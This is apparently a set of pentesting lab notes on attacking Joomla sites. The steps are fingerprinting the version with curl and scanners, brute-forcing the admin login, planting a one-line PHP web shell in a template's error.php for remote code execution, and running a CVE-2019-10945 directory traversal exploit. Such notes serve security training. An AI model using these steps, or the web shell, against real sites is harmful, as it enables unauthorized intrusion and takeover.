Skip to content

Pentesting joomla

Querying this API, we can see over 3 million Joomla installs!

1
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

Important Joomla files and directories

Spot the use of Joomla:

1
curl -s http://dev.inlanefreight.local/ | grep Joomla

Interesting files:

  • robot.txt
  • the telltale Joomla favicon

Joomla version

For spotting the version we can:

1. Read the README.txt file

1
curl -s http://$target/README.txt | head -n 5

2. Fingerprint the version from JavaScript files in the media/system/js/ directory or by browsing to administrator/manifests/files/joomla.xml.

1
curl -s http://$target/administrator/manifests/files/joomla.xml | xmllint --format -

3. Obtain the  cache.xml file. It is located at plugins/system/cache/cache.xml.

1
curl -s http://$target/plugins/system/cache/cache.xml

Run a generic scan with droopescan

1
2
# Run a generic scan
droopescan scan joomla --url http://$target/

Output:

1
2
3
4
Detailed version information. - http://app.inlanefreight.local/administrator/manifests/files/joomla.xml
    Login page. - http://app.inlanefreight.local/administrator/
    License file. - http://app.inlanefreight.local/LICENSE.txt
    Version attribute contains approx version - http://app.inlanefreight.local/plugins/system/cache/cache.xml

Drive a generic scan with joomlascan:

1
2
3
4
5
6
7
8
9
# As I have a virtual environment for 2.7:
pyenv activate 27

# Install joomlascan
git clone https://github.com/drego85/JoomlaScan.git
cd JoomlaScan

# Run the generic scan
python2.7 joomlascan.py -u http://$target

Login page

Admin login page located at http://$target/administrator/index.php

Author login page located at http://$target/index.php/author-login.

The default administrator account on Joomla installs is admin, but the password is set at install time.

joomla-bruteforce

Install from:

1
2
git clone https://github.com/ajnik/joomla-bruteforce.git
cd joomla-bruteforce

And run: 

1
sudo python3 joomla-brute.py -u http://$target -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

the template feature

Once logged in, we can see many options available to us. For our purposes, we would like to add a snippet of PHP code to gain RCE. We can do this by customizing a template.

We may include this line in the error.php page

1
system($_GET['cmd']);

Once this is in, click on Save & Close at the top and confirm code execution using cURL.

1
curl -s http://$target/templates/protostar/error.php?cmd=id

Leveraging enumeration for escalating

Once we know the version of our joomla, we may find vulnerabilities attached to it.

For instance, version 3.9.4 is likely vulnerable to CVE-2019-10945 which is a directory traversal and authenticated file deletion vulnerability.

We can use this exploit script to leverage the vulnerability and list the contents of the webroot and other directories.

1
python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir /
Last update: 2025-02-05
Created: February 2, 2025 19:49:43